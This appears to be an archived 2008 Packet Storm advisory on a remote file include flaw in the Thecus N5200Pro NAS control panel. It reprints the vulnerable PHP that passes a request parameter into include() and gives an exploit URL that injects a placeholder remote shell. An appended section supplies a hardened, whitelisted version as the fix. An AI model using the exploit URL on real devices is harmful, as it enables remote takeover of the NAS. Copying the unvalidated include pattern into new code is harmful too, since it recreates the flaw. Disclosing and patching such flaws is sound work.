thecus-rfi.txt

Date: 20 Feb 2008
Reported by: Crackers_Child
Type: packetstorm
Source: packetstormsecurity.com


Code
`Thecus N5200Pro NAS Server Control Panel Remote File Include  
  
  
Author : Crackers_Child  
  
Mail : [email protected]  
  
Bug in : usrgetform.html  
  
  
<?php  
// $htm is taken directly from the request (GET, POST or cookie), unvalidated  
$htm = $_REQUEST['name'];  
require_once("/img/htdocs/webconfig");  
require_once("/img/www/inc/function.php");  
get_sysconf();  
$version = trim(shell_exec("/bin/cat /img/version"));  
$model = trim(shell_exec('/bin/cat /proc/thecus_io | awk -F: \'/CPUFLAG/{printf("%s", $2)}\''));  
if ($model == "1") {  
    $model_name = $webconfig['product_no'] . $webconfig['pro'];  
} else {  
    $model_name = $webconfig['product_no'];  
}  
if (!$htm) {  
    print 'no name given';  
    exit;  
}  
if ($htm == 'lang') $htm = '../pub/lang';  
session_start();  
header('Content-type: text/html;charset=utf-8');  
$lang = 'en';  
if (isset($_SESSION['lang'])) { $lang = $_SESSION['lang']; }  
ob_start();  
// Vulnerable line: the request-controlled value is passed to include()  
include("$htm.htm");  
$html = ob_get_contents();  
ob_end_clean();  
  
include_once('header.html');  
?>  
  
  
  
Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz?  
  
Info : http://www.thecus.com/products_over.php?cid=11&pid=8  
  
Greetz: Str0ke  
  
  
`
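
A hardened version of the `name` handling in the script above, as an added example that is not part of the advisory or of the Thecus firmware. It assumes modern PHP (7.1+) and that the `.htm` templates sit beside the script with a sibling `pub/` directory; `resolve_template` is a hypothetical helper name.

```php
<?php
// Added example, not vendor code. The directory layout is an assumption.

// Map the user-supplied `name` to a template file on disk, or null if rejected.
function resolve_template(string $name, string $templateDir): ?string
{
    // The original script maps 'lang' to ../pub/lang; keep that mapping
    // server-side so the client never supplies a path.
    $aliases = ['lang' => '../pub/lang'];

    if (isset($aliases[$name])) {
        $relative = $aliases[$name];
    } elseif (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) === 1) {
        // Plain identifiers only: no '/', '.', ':', '?' or NUL, so neither
        // URL wrappers (http://, ftp://, php://) nor ../ traversal can pass.
        $relative = $name;
    } else {
        return null;
    }

    $base = realpath($templateDir);
    $path = realpath($templateDir . '/' . $relative . '.htm');
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }

    // Containment check: the resolved file must live under the template
    // directory or, for the 'lang' alias, under the sibling pub/ directory.
    $roots = [
        $base . DIRECTORY_SEPARATOR,
        dirname($base) . DIRECTORY_SEPARATOR . 'pub' . DIRECTORY_SEPARATOR,
    ];
    foreach ($roots as $root) {
        if (strncmp($path, $root, strlen($root)) === 0) {
            return $path;
        }
    }
    return null;
}

$raw = $_REQUEST['name'] ?? '';
$htm = is_string($raw) ? resolve_template($raw, __DIR__) : null;
if ($htm === null) {
    http_response_code(400);
    exit('invalid name');
}
ob_start();
include $htm;   // absolute, validated local path; never a URL
$html = ob_get_clean();
```

Independently of the code change, setting `allow_url_include = Off` in php.ini stops `include` from fetching URLs at all.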
